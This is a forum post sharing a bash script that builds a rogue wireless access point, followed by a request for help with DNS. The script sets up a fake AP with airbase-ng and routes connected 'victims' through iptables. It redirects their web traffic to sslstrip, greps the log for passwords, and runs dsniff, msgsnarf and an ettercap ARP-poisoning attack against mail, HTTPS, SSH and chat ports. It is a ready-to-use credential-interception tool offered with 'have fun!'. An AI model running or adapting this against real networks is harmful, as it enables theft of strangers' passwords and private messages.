Soft AP bash script
Hey guys
I was getting tired of typing all the command in constantly so I made a litle bash script for it, it is made for Ubuntu so a few changes will be needed, for example BT uses dhpcd in stead of dhcpd3
Now the problem, a lot of the time the other computers don't see the wireless when applied to interface mon or so.
### edit ###
Found the problem only occurs with Windows XP
now the only thing that doesn't work (yet?) is the dns service, the victim can't resolve the dns name but can access IP address directly
Anyone here who has more expirence with the softAP's and is willing to help me???
Code:#!/bin/bash # SoftAP for wireless-testing # Modded by Junke1990 # # Hardware: Eee PC 1000h # NICs # eth0 (LAN) # ra0 (WLAN) rt2860STA # wlan1 (USB WLAN) RTL8170L # dealextreme sku.27963 # init sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py' # services to listen on dsn=1 ims=0 msg=1 # Make sure only root can run our script if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi modprobe tun sleep 1 echo "[>] Starting: Soft AP - Junke1990" # get interface and mac list i=0 iflist=() maclist=() while read -r if mac; do iflist[i]=$if maclist[i]=$mac ((i++)) done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}') for i in "${!iflist[@]}"; do echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" done echo -n "[?] Select your inet conn. [#] " read j intI=${iflist[j]} # select SoftAP adapter for i in "${!iflist[@]}"; do if [ $j != $i ]; then echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" fi done echo -n "[?] Select your SoftAP adapter. [#] " read j intAP=${iflist[j]} # MAC address intAP_MAC=${maclist[j]} echo "[+] Gathering network info..." # info inet conn intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'` intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"` intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2` intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1` # converting netmask in to netmask length echo "[+] Calc'ing network mask..." NETMASK=$intI_mask MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'` MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'` MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'` MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` MASK=$(( BM1 + BM2 + BM3 + BM4)) intI_mask_nb=$MASK # enter wireless essid name echo -n "[?] Enter the desired name for wireless network: "; read ssid # prepare interface / softap #wlanconfig $intAP destroy #wlanconfig $intAP create wlanmode mon wlandev wifi0 if [ `echo $intAP || grep 'mon' ` ]; then intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`; fi echo "[+] Setting up fake AP..."; sleep 1; xterm -geometry 75x15 -e airbase-ng -W 1 -w "1234567890" -c 6 -e "$ssid" -a $intAP_MAC $intAP & sleep 1; ifconfig at0 up ifconfig at0 192.168.3.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route add -net $intI_netw netmask $intI_mask gw $intI_gw route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1 # monitor #xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP & #xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3 echo "[+] Killing dhcpd and dnsmasq..." # do this quiet for when the process isn't running killall -q dhcpd3 killall -q dnsmasq echo "[+] Setting up DHCP config..." # create custom dhcpd.conf for WLAN cat > dhcpd.conf << EOF ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.3.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.3.255; option routers 192.168.3.1; option domain-name-servers 192.168.3.1; option domain-name-servers 208.67.222.222; option domain-name-servers 208.67.220.220; range 192.168.3.10 192.168.3.254; } EOF echo "[+] Cleaning up IP tables..." # iptables cleanup iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo "[+] Setting up forwarding tables..." # iptables iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic #iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router #iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN # ip fwd enable echo 1 > /proc/sys/net/ipv4/ip_forward # start dhcp server for subnet # edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied echo "[+] Setting up DHCP server..." xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 & # restart dnsmasq echo "[+] Setting up dnsmasq..." dnsmasq ### python-twisted-web2 required!!! if [ -f $sslstrip ]; then echo "[+] Setting up sslstrip..." xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 & xterm -e tail -f sslstrip.log & xterm -e "tail -f sslstrip.log |grep 'pass' "& sleep 1 else echo "[-] SSLStrip not found..." echo 'Edit $sslstrip to the correct path.' fi # DSniff if [ $dsn == 1 ]; then if which dsniff >/dev/null; then echo "[+] Setting up dsniff..." xterm -e dsniff -i at0 -m & sleep 1 fi else echo "[-] DSniff not started..." fi # IMSniff - MSN only if [ $ims == 1 ]; then if which imsniff >/dev/null; then if [ ! -d 'IMlog' ]; then mkdir IMlog fi # gives a lot of unknown content err's xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& sleep 1 fi else echo "[-] IMSniff not started..." fi # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo if [ $msg == 1 ]; then if which msgsnarf >/dev/null; then echo "[+] Setting up msgsnarf..." xterm -e msgsnarf -i at0 & sleep 1 fi else echo "[-] MSGSnarf not started..." fi # ettercap TCP Ports # IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS) # POP3 - 110/TCP 995/TCP # SMTP - 25/TCP 465/TCP # SSL - 443/TCP # HTTP - 80/TCP # SSH - 22/TCP # MSN - 1863/TCP # Yahoo - 5050/TCP - nobody interesting uses yahoo... # ICQ - 5190/TCP - nobody at all uses ICQ xD sleep 1 echo "[+] Setting up ettercap..." xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 & sleep 1 # ip_forward # as last to avoid reset echo "[+] Enabling IP forward..." echo "1" > /proc/sys/net/ipv4/ip_forward chk=`cat /proc/sys/net/ipv4/ip_forward` if [ $chk != "1" ]; then echo "Can't enable ip_forward" fi echo "[x] All done! have fun!"
